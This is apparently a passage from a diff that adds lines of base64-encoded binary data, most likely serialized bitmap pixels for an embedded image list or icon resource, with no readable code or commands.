+ Af8DuAH/A7YB/wO1Af8DtAH/A7MB/wOxAf8DrwH/A68B/wOtAf8DrAH/A6sB/wOqAf8DqQH/A6cB/wOm
+ Af8DpQH/A6MB/wONAf8DhAH/A5oB/wOfAf8DngH/A5wB/wObAf8DmwH/A5kB/wOYAf8DlwH/A5YB/wOV
+ Af8DlAH/A5MB/wORAf8DkQH/A5AB/wOPAf8DjwH/A44B/wOMAf8DOwFl5AADUgGkAV8BeAGAAfMBYQHK
+ AesB/wFhAcoB6wH/AWEBygHrAf8BYQHKAesB/wFhAcoB6wH/AWEBygHrAf8BYQHKAesB/wFhAckB6QH/
+ AVsBvQHaAf8BQQGaAbMB/wFDAZwBtQH/AUMBngG3Af8BRAGfAbgB/wFNAawByAH/AVYBuwHaAf8BWwHE
+ AeQB/wFbAcQB5AH/AVsBxAHkAf8BWwHEAeQB/wFfAcYB5QH/AWEBxwHlAf8BYQHHAeUB/wFdAcUB5AH/
+ AVsBxAHkAf8BWwHEAeQB/wNcAckDHQEqOAADBAEFAxcBIAONAfkD2AH/A9cB/wPVAf8DsgH/A9QB/wPT
+ Af8D0QH/A9AB/wPQAf8DzgH/A84B/wPNAf8DzAH/A8wB/wPMAf8D1AX/A/YB/wPuAf8D7gH/A+4B/wP5
+ Af8D8gH/A9AB/wPMAf8DzAH/A80B/wPOAf8DzgH/A88B/wPRAf8D0QH/A9IB/wPUAf8DvQH/A7MB/wPX
+ Af8D2AH/A9gB/wNOAZUDEQEXAwIBAwwAAxoBJAOtAf0DvQH/A7wB/wO7Af8DuQH/A7gB/wO3Af8DtQH/
+ A7QB/wOzAf8DsgH/A7AB/wOvAf8DrgH/A6wB/wOrAf8DqwH/A6kB/wOnAf8DpgH/A5AB/wOGAf8DnAH/
+ A6EB/wOhAf8DnwH/A54B/wOdAf8DnAH/A5sB/wOaAf8DmAH/A5cB/wOWAf8DlQH/A5QB/wOTAf8DkgH/
+ A5EB/wOQAf8DjwH/A3AB+wMVAR3kAANSAaMBXwF7AYEB8wFiAcsB7QH/AWIBywHtAf8BYgHLAe0B/wFi
+ AcsB7QH/AWIBywHtAf8BYgHLAe0B/wFiAcsB7QH/AWIBygHrAf8BXAG+AdwB/wFBAZsBtAH/AUMBnQG2
+ Af8BQwGeAbgB/wFEAZ8BuQH/AU0BrQHJAf8BVgG8AdsB/wFbAcUB5QH/AVsBxQHlAf8BXAHFAeUB/wFd
+ AcYB5gH/AWEByAHmAf8BYQHIAeYB/wFhAccB5gH/AVwBxgHlAf8BWwHFAeUB/wFcAcUB5QH/A1wByQMe
+ ASs4AAMCAQMDFAEbA1wBzwPZAf8D2AH/A8sB/wOiAf8D1gH/A9UB/wPTAf8D0gH/A9IB/wPQAf8D0AH/
+ A88B/wPOAf8DzgH/A8wB/wPeAf8D3gH/A9UB/wPMAf8DzAH/A8wB/wPYAf8D2wH/A80B/wPIAf8DzgH/
+ A88B/wPQAf8D0AH/A9EB/wPTAf8D0wH/A9QB/wPWAf8D1wH/A60B/wPYAf8D2QH/A9kB/wNFAX0DDgET
+ AwEBAgwAAwMBBANgAeADwAH/A74B/wO9Af8DvAH/A7oB/wO5Af8DuAH/A7cB/wO2Af8DtQH/A7MB/wOy
+ Af8DsAH/A68B/wOuAf8DrQH/A6sB/wOpAf8DpgH/A5AB/wOKAf8DnwH/A6QB/wOjAf8DogH/A6AB/wOg
+ Af8DngH/A50B/wOcAf8DmwH/A5kB/wOZAf8DmAH/A5cB/wOVAf8DlQH/A5MB/wOSAf8DkQH/A18B2wMA
+ AQHkAANSAaMBXwF7AYIB8wGAAcwB7gH/AYABzAHuAf8BgAHMAe4B/wGAAcwB7gH/AYABzAHuAf8BgAHM
+ Ae4B/wGAAcwB7gH/AYABywHsAf8BYwG/Ad0B/wFCAZsBtAH/AUQBnQG3Af8BRAGfAbkB/wFFAaABugH/
+ AU0BrQHKAf8BVwG9AdwB/wFcAcYB5gH/AVwBxgHmAf8BXQHGAeYB/wFfAccB5wH/AWgByQHnAf8BaAHJ
+ AecB/wFgAccB5wH/AV0BxgHmAf8BXAHGAeYB/wFdAcYB5gH/A10BygMfASw4AAMCAQMDEQEXA0wBjwPZ
+ Af8D2QH/A8EB/wORAf8D1wH/A9YB/wPVAf8D1AH/A9MB/wPSAf8D0gH/A9EB/wPQAf8D0AH/A58B/wPF
+ Af8DzwH/A88B/wPOAf8DzgH/A84B/wPPAf8DzwH/A70B/wO9Af8D0AH/A9EB/wPSAf8D0gH/A9MB/wPU
+ Af8D1QH/A9YB/wPXAf8D2AH/A6cB/wPZAf8D2QH/A9oB/wNEAXoDDAEQAwABARAAA04BmAPDAf8DwQH/
+ A8AB/wO/Af8DvQH/A7wB/wO7Af8DuQH/A7kB/wO3Af8DtgH/A7UB/wO0Af8DswH/A7EB/wOvAf8DrgH/
+ A7AB/wOUAf8DjgH/A40B/wOjAf8DpwH/A6YB/wOlAf8DowH/A6IB/wOhAf8DoAH/A58B/wOdAf8DnAH/
+ A5sB/wOaAf8DmQH/A5cB/wOXAf8DlgH/A5UB/wOUAf8DUgGp6AADUgGjAWYBewGCAfMBgwHPAfAB/wGC
+ Ac4B7wH/AYEBzQHvAf8BgQHNAe8B/wGBAc0B7wH/AYEBzQHvAf8BgQHNAe8B/wGBAcwB7QH/AWQBvwHe
+ Af8BQwGcAbYB/wFFAZ4BuQH/AUUBoAG7Af8BRgGhAbwB/wFOAa4BzAH/AVgBvgHeAf8BXQHHAegB/wFd
+ AccB6AH/AV4ByAHoAf8BaQHJAekB/wGBAcoB6QH/AYAByQHpAf8BXwHHAegB/wFdAccB6AH/AV4BxwHo
+ Af8BYAHIAegB/wNdAcoDHwEsOAADAQECAw4BEwNFAX0D2gH/A9kB/wPLAf8DlwH/A9gB/wPXAf8D1gH/
+ A9YB/wPVAf8D1AH/A9MB/wPTAf8D0gH/A9IB/wOjAf8DvgH/A9EB/wPRAf8D0AH/A9AB/wPQAf8D0QH/
+ A9EB/wPAAf8DuwH/A9IB/wPTAf8D1AH/A9QB/wPVAf8D1gH/A9YB/wPXAf8D2AH/A9gB/wOkAf8D2gH/
+ A9oB/wPXAf8DQgF1AwoBDQMAAQEQAAMxAU0DxgH/A8QB/wPDAf8DwgH/A8AB/wO/Af8DvwH/A70B/wO8
+ Af8DugH/A7kB/wO4Af8DtwH/A7UB/wO0Af8DswH/A6sB/wOWAf8DlAH/A5IB/wOQAf8DpQH/A6kB/wOo
+ Af8DpwH/A6YB/wOlAf8DpAH/A6IB/wOiAf8DoAH/A58B/wOdAf8DnQH/A5sB/wOaAf8DmgH/A5gB/wOX
+ Af8DkgH/A0IBdugAA1EBogFnAXkBgAHyAYkB0QHyAf8BhAHQAfEB/wGCAc8B8QH/AYIBzwHxAf8BggHP
+ AfEB/wGCAc8B8QH/AYIBzwHxAf8BggHOAe8B/wFlAcEB3wH/AUMBnQG2Af8BRQGfAbkB/wFFAaEBuwH/
+ AUYBogG8Af8BTwGvAcwB/wFZAb8B3wH/AV4ByAHpAf8BXwHIAekB/wFgAcoB6gH/AYIBywHqAf8BggHL
+ AeoB/wGBAcoB6gH/AV4ByAHpAf8BXgHIAekB/wFgAckB6QH/AXABygHqAf8DXQHKAx8BLDsAAQEDDAEQ
+ A0MBeAPbAf8D2wH/A9kB/wOoAf8D2QH/A9kB/wPYAf8D2AH/A9cB/wPWAf8D1QH/A9UB/wPUAf8D1AH/
+ A8gB/wO+Af8D0wH/A9MB/wPSAf8D0gH/A9IB/wPTAf8D0wH/A8kB/wPSAf8D1AH/A9UB/wPWAf8D1gH/
+ A9cB/wPYAf8D2AH/A9gB/wPZAf8D2QH/A6oB/wPbAf8D2wH/A9EB/wNBAXIDCAELAwABARAAAwoBDgN5
+ AfYDxwH/A8YB/wPFAf8DwwH/A8EB/wPBAf8DvwH/A74B/wO9Af8DvAH/A7sB/wO5Af8DuAH/A7gB/wOr
+ Af8DmQH/A5wB/wOrAf8DmwH/A5MB/wOoAf8DrAH/A6sB/wOqAf8DqQH/A6cB/wOmAf8DpQH/A6QB/wOj
+ Af8DoQH/A6AB/wOfAf8DnQH/A50B/wOcAf8DmgH/A5kB/wNqAfQDMQFO6AADUQGiAWcBeQGAAfIBiwHT
+ AfMB/wGJAdIB8wH/AYQB0AHyAf8BgwHQAfIB/wGDAdAB8gH/AYMB0AHyAf8BgwHQAfIB/wGDAc8B8AH/
+ AWUBwgHgAf8BRAGeAbcB/wFGAaABugH/AUYBogG8Af8BRwGjAb0B/wFQAbABzQH/AVoBwAHgAf8BXwHJ
+ AeoB/wFgAckB6gH/AW4BywHrAf8BgwHMAesB/wGDAcwB6wH/AWkBywHqAf8BXwHJAeoB/wFfAckB6gH/
+ AWEBywHqAf8BgwHMAesB/wNdAcoDHwEsOwABAQMKAQ0DQgF1A9kB/wPbAf8D2wH/A7AB/wPaAf8D2QH/
+ A9kB/wPYAf8D2AH/A9cB/wPXAf8D1wH/A9YB/wPWAf8D1QH/A9YB/wPFAf8D1QH/A9UB/wPVAf8D1QH/
+ A9IB/wPSAf8D3wH/A9YB/wPWAf8D1wH/A9cB/wPYAf8D2AH/A9gB/wPZAf8D2QH/A9oB/wOdAf8DsgH/
+ A9sB/wPcAf8D0AH/A0ABbgMHAQkDAAEBFAADXAHMA8oB/wPJAf8DyAH/A8YB/wPFAf8DxAH/A8IB/wPB
+ Af8DwAH/A74B/wO+Af8DvAH/A7oB/wOzAf8DnQH/A6QB/wO2Af8DtAH/A6AB/wOXAf8DqwH/A68B/wOu
+ Af8DrQH/A6wB/wOrAf8DqQH/A6cB/wOnAf8DpgH/A6QB/wOjAf8DogH/A6EB/wOgAf8DngH/A50B/wOc
+ Af8DYQHcAyIBMugAA1IBoQFnAXkBgAHyAYwB1AH0Af8BjAHUAfQB/wGJAdMB9AH/AYQB0gHzAf8BhAHR
+ AfMB/wGDAdEB8wH/AYMB0QHzAf8BgwHQAfEB/wFlAcMB4QH/AUQBnwG4Af8BRgGhAbsB/wFGAaIBvQH/
+ AUcBowG+Af8BUAGxAc4B/wFaAcEB4QH/AV8BygHrAf8BZgHKAesB/wGCAcwB7AH/AYQBzQHsAf8BgwHN
+ AewB/wFoAcsB6wH/AV8BygHrAf8BYgHKAesB/wFzAcwB7AH/AYQBzQHsAf8DXQHKAx8BLDsAAQEDCAEL
+ A0ABcQPTAf8D3AH/A9sB/wPMAf8DngH/A9oB/wPZAf8D2QH/A9kB/wPYAf8D2AH/A9gB/wPXAf8D1wH/
+ A9cB/wPWAf8D1wH/A9sB/wPWAf8D1QH/A9gB/wPgAf8D1wH/A9cB/wPXAf8D1wH/A9gB/wPYAf8D2AH/
+ A9gB/wPZAf8D2QH/A9oB/wPYAf8DoAH/A9sB/wPcAf8D3AH/A7cB/QM9AWkDBQEHGAADTgGYA80B/wPM
+ Af8DywH/A8kB/wPIAf8DxwH/A8UB/wPEAf8DwwH/A8EB/wPAAf8DvgH/A7sB/wOkAf8DpQH/A7UB/wO5
+ Af8DtwH/A6IB/wObAf8DnwH/A68B/wOyAf8DsAH/A64B/wOtAf8DrAH/A6sB/wOqAf8DqAH/A6cB/wOl
+ Af8DpQH/A6MB/wOiAf8DoQH/A6AB/wOfAf8DWwHDAxIBGegAA1EBoAFnAXsBgAHyAY4B1gH2Af8BjgHW
+ AfYB/wGNAdUB9gH/AYoB1AH1Af8BhgHTAfUB/wGFAdIB9QH/AYQB0gH1Af8BhAHRAfMB/wFmAcQB4wH/
+ AUUBnwG6Af8BRwGhAb0B/wFHAaMBvwH/AUgBpAHAAf8BUQGyAdAB/wFbAcIB4gH/AWABywHtAf8BaAHM
+ Ae0B/wGEAc4B7gH/AYUBzgHuAf8BgwHOAe4B/wFnAcwB7QH/AWABywHtAf8BaAHMAe0B/wGEAc4B7gH/
+ AYUBzgHuAf8DXQHKAx8BLDsAAQEDBwEJA0ABbgPRAf8D3QH/A90B/wPcAf8DwgH/A8MB/wPbAf8D2gH/
+ A9oB/wPaAf8D2QH/A9kB/wPZAf8D2QH/A9gB/wPYAf8D2AH/A9gB/wPYAf8D2AH/A9gB/wPYAf8D2AH/
+ A9gB/wPZAf8D2QH/A9kB/wPZAf8D2gH/A9oB/wPaAf8D2wH/A9sB/wPBAf8DygH/A9wB/wPdAf8D3AH/
+ A2wB6QMzAVIDBAEFGAADPAFmA6wB/gPOAf8DzQH/A8sB/wPKAf8DyQH/A8gB/wPGAf8DxQH/A8QB/wPC
+ Af8DwQH/A7MB/wOmAf8DsgH/A7wB/wO7Af8DugH/A6YB/wOeAf8DmgH/A58B/wOsAf8DtAH/A7EB/wOw
+ Af8DrgH/A60B/wOsAf8DqwH/A6kB/wOoAf8DpwH/A6YB/wOlAf8DpAH/A6IB/wOhAf8DUwGlAwMBBOgA
+ A1EBoAFnAXsBgAHyAY8B1wH3Af8BjwHXAfcB/wGPAdcB9wH/AY8B1wH3Af8BjQHWAfcB/wGHAdQB9gH/
+ AYUB0wH2Af8BhQHSAfQB/wFnAcUB5AH/AUYBoAG6Af8BSAGiAb0B/wFIAaQBvwH/AUkBpQHAAf8BUgGz
+ AdAB/wFcAcMB4wH/AWEBzAHuAf8BgQHNAe4B/wGFAc8B7wH/AYYBzwHvAf8BgwHOAe4B/wFoAcwB7gH/
+ AWEBzAHuAf8BgQHOAe4B/wGFAc8B7wH/AYYBzwHvAf8DXQHKAx8BLDwAAwUBBwM+AWoD0AH/A9wB/wPd
+ Af8D3QH/A9wB/wO6Af8D2QH/A9sB/wPbAf8D2gH/A9oB/wPaAf8D2QH/A9kB/wPZAf8D2QH/A9kB/wPZ
+ Af8D2QH/A9kB/wPZAf8D2QH/A9kB/wPZAf8D2QH/A9oB/wPaAf8D2gH/A9oB/wPaAf8D2wH/A9sB/wPM
+ Af8DxAH/A90B/wPdAf8D3AH/A9wB/wNdAcoDIQEwAwMBBBgAAywBQwNyAe4D0AH/A9AB/wPOAf8DzQH/
+ A8wB/wPKAf8DygH/A8kB/wPHAf8DxgH/A8MB/wOxAf8DpwH/A8AB/wO/Af8DvgH/A70B/wOpAf8DoQH/
+ A7EB/wOeAf8DnAH/A6gB/wO0Af8DswH/A7IB/wOwAf8DrwH/A64B/wOsAf8DqwH/A6sB/wOpAf8DqAH/
+ A6YB/wOlAf8DpAH/A0IBduwAA1EBnwFnAXsBgAHyAZAB2AH4Af8BkAHYAfgB/wGQAdgB+AH/AZAB2AH4
+ Af8BkAHYAfgB/wGOAdgB+AH/AYsB1gH3Af8BhwHUAfUB/wFoAcYB5AH/AUcBoQG7Af8BSQGjAb4B/wFJ
+ AaUBwAH/AUoBpgHBAf8BUwGzAdEB/wFdAcQB5AH/AWgBzQHvAf8BhQHPAfAB/wGIAdAB8AH/AYgB0AHw
+ Af8BggHPAe8B/wFsAc0B7wH/AWgBzQHvAf8BhQHPAfAB/wGIAdAB8AH/AYgB0AHwAf8DXQHKAx8BLDwA
+ AwQBBgMzAVMDbAHqA9gB/wNhAf8DuwH/A90B/wPSAf8DyQH/A9wB/wPbAf8D2wH/A9sB/wPaAf8D2gH/
+ A9oB/wPaAf8D2gH/A9oB/wPaAf8D2gH/A9oB/wPaAf8D2gH/A9oB/wPaAf8D2gH/A9oB/wPaAf8D2wH/
+ A9sB/wPbAf8D3AH/A9oB/wPHAf8D1QH/A90B/wOzAf8DawH/A9gB/wNZAb8DGAEiAwIBAxgAAx0BKgNg
+ AdQD0wH/A9IB/wPRAf8DzwH/A88B/wPNAf8DzQH/A8wB/wPKAf8DyQH/A8IB/wOyAf8DsgH/A8QB/wPC
+ Af8DwQH/A8AB/wOsAf8DpAH/A7gB/wO6Af8DqAH/A54B/wOpAf8DtgH/A7UB/wOzAf8DsgH/A7EB/wOv
+ Af8DrgH/A60B/wOsAf8DqwH/A6kB/wOoAf8DpwH/AysBQuwAA1EBnwFoAXsBgQHyAZEB2QH5Af8BkQHZ
+ AfkB/wGRAdkB+QH/AZEB2QH5Af8BkQHZAfkB/wGRAdkB+QH/AZAB2QH5Af8BjQHWAfcB/wF0AcgB5gH/
+ AUcBogG8Af8BSQGkAb8B/wFJAaYBwQH/AUoBpwHCAf8BUwG0AdIB/wFdAcUB5gH/AYEBzwHwAf8BiAHR
+ AfEB/wGJAdEB8QH/AYcB0QHxAf8BgQHPAfAB/wGBAc8B8AH/AYEBzwHxAf8BiAHRAfEB/wGJAdEB8QH/
+ AYkB0QHxAf8DXQHKAx8BLDwAAwMBBAMiATEDXQHKA9UB/wOpAf8DxgH/A9wB/wPcAf8D0wH/A8MB/wPc
+ Af8D3AH/A9wB/wPcAf8D3AH/A9sB/wPbAf8D2wH/A9sB/wPbAf8D2wH/A9sB/wPbAf8D2wH/A9sB/wPb
+ Af8D2wH/A9wB/wPcAf8D3AH/A9wB/wPdAf8D3QH/A8AB/wPVAf8D3AH/A9wB/wO9Af8DpAH/A9cB/wNa
+ Ab0DFQEdAwEBAhgAAwwBEANXAboD1QH/A9QB/wPSAf8D0QH/A9EB/wPPAf8DzwH/A84B/wPNAf8DzAH/
+ A8UB/wO1Af8DuAH/A8cB/wPFAf8DxAH/A8MB/wOvAf8DqAH/A7oB/wO9Af8DvAH/A64B/wOhAf8DrwH/
+ A7gB/wO2Af8DtAH/A7MB/wOyAf8DsQH/A68B/wOuAf8DrQH/A6wB/wOqAf8DhQH7Aw0BEuwAA1EBnwFo
+ AXsBgwHyAZEB2gH6Af8BkQHaAfoB/wGRAdoB+gH/AZEB2gH6Af8BkQHaAfoB/wGRAdoB+gH/AZEB2gH6
+ Af8BkAHYAfgB/wGHAcoB5wH/AUcBowG9Af8BSQGlAcAB/wFJAaYBwgH/AUoBpwHDAf8BUwG1AdMB/wFe
+ AcYB5wH/AYMB0AHxAf8BiAHSAfIB/wGIAdIB8gH/AYUB0QHyAf8BgQHQAfEB/wGBAdAB8QH/AYYB0QHy
+ Af8BiAHSAfIB/wGJAdIB8gH/AYkB0gHyAf8DXQHKAx8BLDwAAwIBAwMYASIDWQG+A9oB/wPaAf8D2wH/
+ A9sB/wPcAf8D3AH/A9wB/wPPAf8DzwH/A90B/wPdAf8D3AH/A9wB/wPcAf8D3AH/A9wB/wPcAf8D3AH/
+ A9wB/wPcAf8D3AH/A9wB/wPcAf8D3AH/A9wB/wPdAf8D3QH/A90B/wPdAf8D2wH/A7UB/wPcAf8D2wH/
+ A9sB/wPbAf8D2gH/A9oB/wNYAbsDEwEaAwEBAhwAA08BlwPWAf8D1gH/A9UB/wPUAf8D1AH/A9IB/wPR
+ Af8D0QH/A88B/wPGAf8DuAH/A7YB/wO1Af8DuQH/A8cB/wPGAf8DxgH/A7MB/wOqAf8DvgH/A8AB/wO/
+ Af8DuwH/A6gB/wOjAf8DuAH/A7gB/wO4Af8DtwH/A7UB/wO0Af8DswH/A7EB/wOwAf8DrwH/A60B/wNd
+ AcrwAANQAZ4BawF7AYAB8QGTAdsB+wH/AZMB2wH7Af8BkwHbAfsB/wGTAdsB+wH/AZMB2wH7Af8BkwHb
+ AfsB/wGTAdsB+wH/AZIB2QH5Af8BiQHLAegB/wFIAaMBvgH/AUoBpgHCAf8BTAGoAcQB/wFNAaoBxwH/
+ AVYBuQHXAf8BbQHJAeoB/wGIAdMB8wH/AYoB1AHzAf8BiQHTAfMB/wGEAdEB8gH/AYIB0AHyAf8BhAHR
+ AfIB/wGKAdQB8wH/AYoB1AHzAf8BigHUAfMB/wGKAdQB8wH/A10BygMfASw8AAMBAQIDFgEeA1gBvAPZ
+ Af8D2gH/A9oB/wPQAf8D7gH/A/YB/wPoAf8D6AH/A98B/wPCAf8D2QH/A9gB/wPdAf8D3QH/A90B/wPd
+ Af8D3AH/A9wB/wPcAf8D3AH/A90B/wPdAf8D3QH/A90B/wPdAf8D3QH/A9wB/wPcAf8D3AH/A88B/wOn
+ Af8D2wH/A9sB/wPaAf8D2gH/A9kB/wPYAf8DWAG5AxABFgMAAQEcAAM7AWQD2AH/A9kB/wPXAf8D1wH/
+ A9YB/wPUAf8D0wH/A9MB/wPRAf8DvAH/A7oB/wO5Af8DuAH/A7YB/wPEAf8DygH/A8kB/wO3Af8DrwH/
+ A8EB/wPDAf8DwgH/A74B/wOwAf8DpgH/A7QB/wO5Af8DuwH/A7kB/wO4Af8DtwH/A7UB/wO0Af8DswH/
+ A7IB/wOwAf8DRQF98AADUAGdAWsBewGAAfEBkwHbAfsB/wGTAdsB+wH/AZMB2wH7Af8BkwHbAfsB/wGT
+ AdsB+wH/AZMB2wH7Af8BkwHbAfsB/wGSAdkB+QH/AYkBywHpAf8BSgGlAb8B/wFMAakBxAH/AU8BrQHJ
+ Af8BUgGzAdAB/wFbAcEB4AH/AXABzQHuAf8BiwHVAfQB/wGMAdUB9AH/AYoB1AH0Af8BggHRAfMB/wGD
+ AdIB8wH/AYcB0wH0Af8BjAHVAfQB/wGMAdUB9AH/AYwB1QH0Af8BjAHVAfQB/wNdAcoDHwEsPwABAQMT
+ ARoDVwG6A9cB/wPYAf8DyQH/A7IB/wPfAf8D5gH/A+YB/wP+Af8D+AH/A/MB/wPoAf8D1wH/A9UB/wPM
+ Af8D3AH/A9wB/wPcAf8D3AH/A9wB/wPcAf8D3AH/A9wB/wPcAf8D3AH/A9wB/wPbAf8D2wH/A9sB/wPb
+ Af8DvgH/A5wB/wPaAf8D2QH/A9kB/wPYAf8D1wH/A9YB/wNXAbcDDgETAwABARwAAyIBMQPFAf4D2wH/
+ A9kB/wPZAf8D2AH/A9cB/wPVAf8D1QH/A9MB/wPMAf8DuwH/A7UB/wO0Af8DvAH/A8sB/wPNAf8DywH/
+ A7oB/wOxAf8DxAH/A8YB/wPFAf8DtAH/A64B/wOpAf8DrAH/A64B/wO9Af8DvAH/A7oB/wO5Af8DuAH/
+ A7cB/wO2Af8DtAH/A7IB/wMiATHwAANRAZwBawF7AYAB8QGUAdwB+wH/AZQB3AH7Af8BlAHcAfsB/wGU
+ AdwB+wH/AZQB3AH7Af8BlAHcAfsB/wGUAdwB+wH/AZMB2gH5Af8BigHMAeoB/wFLAacBwwH/AVABsAHN
+ Af8BVgG6AdcB/wFcAcMB4wH/AWgBzQHtAf8BhQHTAfMB/wGMAdYB9QH/AYsB1gH1Af8BiAHUAfUB/wGC
+ AdIB9AH/AYMB0wH0Af8BiQHVAfUB/wGMAdYB9QH/AYwB1gH1Af8BjAHWAfUB/wGMAdYB9QH/A1wByQMd
+ ASo/AAEBAxABFgNXAbgD1QH/A9UB/wO5Af8DsgH/A9kB/wPZAf8D2gH/A9oB/wPaAf8D7wn/A/sB/wPb
+ Af8DzgH/A7MB/wPbAf8D2wH/A9sB/wPbAf8D2wH/A9sB/wPbAf8D2wH/A9sB/wPbAf8D2gH/A9oB/wPa
+ Af8DrQH/A5QB/wPZAf8D2AH/A9cB/wPWAf8D1AH/A9MB/wNVAbUDDAEQIAADAwEEA2gB9QPcAf8D2wH/
+ A9sB/wPaAf8D2AH/A9gB/wPYAf8D1gH/A9UB/wPUAf8D0wH/A9IB/wPRAf8D0AH/A84B/wPOAf8DvQH/
+ A7MB/wPHAf8DyQH/A8gB/wOxAf8DrgH/A60B/wOrAf8DrgH/A8AB/wO/Af8DvQH/A70B/wO8Af8DugH/
+ A7kB/wO4Af8DZAHsAwABAfAAA1EBnAFrAXsBgAHxAZQB3gH9Af8BlAHeAf0B/wGUAd4B/QH/AZQB3gH9
+ Af8BlAHeAf0B/wGUAd4B/QH/AZQB3gH9Af8BkwHcAfsB/wGMAdEB7QH/AVMBtQHSAf8BXQHCAeAB/wFn
+ AckB6gH/AWkBzwHwAf8BhAHSAfQB/wGKAdYB9gH/AY0B1wH2Af8BjAHXAfYB/wGHAdUB9QH/AYMB0wH1
+ Af8BhgHUAfUB/wGMAdYB9gH/AY0B1wH2Af8BjQHXAfYB/wGNAdcB9gH/AY0B1wH2Af8DXAHJAx0BKj8A
+ AQEDDgETA1YBtgPSAf8D0wH/A8wB/wOdAf8D1gH/A9cB/wPYAf8D2QH/A9oB/wPaAf8D2gH/A+kB/wPz
+ Af8D+gH/A+8B/wPnAf8DzwH/A88B/wPHAf8D2wH/A9sB/wPbAf8D2wH/A9oB/wPaAf8D2gH/A9oB/wPa
+ Af8D2QH/A6gB/wOVAf8D1wH/A9UB/wPUAf8D0wH/A9IB/wPRAf8DTAGPAwoBDSQAA1QBrgPeAf8D3QH/
+ A9wB/wPcAf8D2wH/A9oB/wPZAf8D2AH/A9cB/wPXAf8D1QH/A9QB/wPUAf8D0gH/A9EB/wPQAf8DwAH/
+ A7cB/wPLAf8DzAH/A8sB/wOyAf8DsAH/A64B/wOuAf8DswH/A8MB/wPCAf8DwAH/A78B/wO+Af8DvAH/
+ A7wB/wO6Af8DVwG6AwABAfAAA1EBnAFrAX4BgAHxAZMB4AH9Af8BkwHgAf0B/wGTAeAB/QH/AZMB4AH9
+ Af8BkwHgAf0B/wGTAeAB/QH/AZMB4AH9Af8BlAHeAfoB/wGMAdIB7gH/AV0BxAHkAf8BcQHOAfAB/wGC
+ AdIB9AH/AYQB0wH1Af8BhgHVAfYB/wGMAdcB9wH/AY4B2AH3Af8BjAHXAfcB/wGGAdUB9gH/AYQB1AH2
+ Af8BigHWAfcB/wGOAdgB9wH/AY4B2AH3Af8BjgHYAfcB/wGOAdgB9wH/AY4B2AH3Af8DXAHJAx0BKkAA
+ AwwBEANWAbQD0AH/A9EB/wPSAf8DbAH/A9QB/wPVAf8D1gH/A9cB/wPYAf8D2AH/A9gB/wPZAf8D2QH/
+ A+EB/wPtBf8D7wH/A90B/wPGAf8DvQH/A9kB/wPZAf8D2QH/A9kB/wPZAf8D2AH/A9gB/wPYAf8D1wH/
+ A6UB/wOpAf8D1QH/A9MB/wPSAf8D0QH/A9AB/wPPAf8DMQFPAwgBCyQAAzoBYgPfAf8D3wH/A94B/wPd
+ Af8D3QH/A9wB/wPbAf8D2QH/A9kB/wPZAf8D1wH/A9YB/wPWAf8D1AH/A9MB/wPSAf8DwgH/A7oB/wPN
+ Af8DzgH/A80B/wPEAf8DwgH/A8AB/wO/Af8DwgH/A8YB/wPFAf8DwwH/A8IB/wPAAf8DvwH/A74B/wO9
+ Af8DSQGH9AADUAGbAWsBfgGAAfEBkQHhAf0B/wGRAeEB/QH/AZEB4QH9Af8BkQHhAf0B/wGRAeEB/QH/
+ AZEB4QH9Af8BkQHhAf0B/wGZAd0B9gH/AYkByQHiAf8BggHSAfQB/wGEAdQB9gH/AYQB1AH3Af8BhAHU
+ AfcB/wGIAdYB9wH/AY0B2AH4Af8BjgHYAfgB/wGKAdcB+AH/AYUB1QH3Af8BhQHUAfcB/wGMAdcB+AH/
+ AY4B2AH4Af8BjgHYAfgB/wGOAdgB+AH/AY4B2AH4Af8BjgHYAfgB/wNcAckDHQEqQAADCgEOA0wBkAPM
+ Af8DzgH/A9AB/wNWAf8D0QH/A9IB/wPTAf8D1AH/A9UB/wPVAf8D1gH/A9YB/wPXAf8D1wH/A9gB/wPY
+ Af8D/AX/A9gB/wPFAf8DvwH/A9cB/wPXAf8D1wH/A9YB/wPWAf8D1QH/A9UB/wPUAf8DogH/A78B/wPS
+ Af8D0AH/A88B/wPOAf8DzQH/A8sB/wMhATADBwEJJAADEAEVA7MB/gPgAf8D3wH/A98B/wPeAf8D3gH/
+ A90B/wPcAf8D2wH/A9sB/wPZAf8D2AH/A9gB/wPXAf8D2AH/A9gB/wPIAf8DvgH/A9MB/wPUAf8D0QH/
+ A88B/wPNAf8DzQH/A8sB/wPJAf8DyQH/A8cB/wPGAf8DxQH/A8QB/wPCAf8DwQH/A4YB/AM1AVf0AANQ
+ AZsBawF+AYIB8QGPAeEB/QH/AY8B4QH9Af8BkAHhAf0B/wGRAeIB/QH/AZIB3wH6Af8BlAHcAfYB/wGT
+ AdQB7AH/AYYBzAHnAf8BgwHPAe8B/wGEAdUB+AH/AYUB1QH4Af8BhQHVAfgB/wGFAdUB+AH/AYwB2AH5
+ Af8BjwHZAfkB/wGQAdkB+QH/AYkB1wH4Af8BhgHVAfgB/wGIAdcB+AH/AY8B2AH5Af8BkQHZAfkB/wGR
+ AdkB+QH/AZEB2gH5Af8BkgHZAfkB/wGKAcwB6wH/AVgCWgHAAxwBJ0AAAwgBCwMyAVEDyAH/A8sB/wPN
+ Af8DSAH/A84B/wPPAf8D0AH/A9EB/wPSAf8D0gH/A9MB/wPTAf8D1AH/A9QB/wPUAf8D1QH/A9UB/wPn
+ Bf8D3wH/A7UB/wO8Af8D1AH/A9QB/wPTAf8D0wH/A9IB/wPSAf8D0QH/A6EB/wPPAf8DzwH/A80B/wPN
+ Af8DywH/A8kB/wPIAf8DHwEsAwYBCCgAA14B2QPiAf8D4QH/A+EB/wPgAf8D4AH/A98B/wPeAf8D3QH/
+ A9wB/wPbAf8D2wH/A9oB/wPYAf8DxAH/A8IB/wPDAf8DwwH/A8EB/wO8Af8DygH/A9EB/wPQAf8DzwH/
+ A84B/wPMAf8DzAH/A8sB/wPJAf8DyAH/A8cB/wPFAf8DxAH/A2cB5QMnATv0AANQAZsBaQF+AYIB8QGN
+ AeIB/QH/AY8B4gH8Af8BkAHhAfoB/wGRAd4B9gH/AZIB1gHvAf8BdAHNAegB/wGGAdIB8QH/AYQB0wH0
+ Af8BhAHVAfgB/wGFAdYB+QH/AYUB1gH5Af8BhgHWAfkB/wGHAdcB+QH/AY8B2gH6Af8BkQHbAfoB/wGR
+ AdsB+gH/AYkB1gH4Af8BfwGxAckB/gF0AY8BqwH8AWoBiQGOAfkBZQFzAXcB9AFiAWYBawHvAWABZQFn
+ AegDYQHhA2EB2gNJAYgDEwEaQAADBwEJAyIBMQOuAf4DxgH/A8kB/wM+Af8DywH/A80B/wPOAf8DzwH/
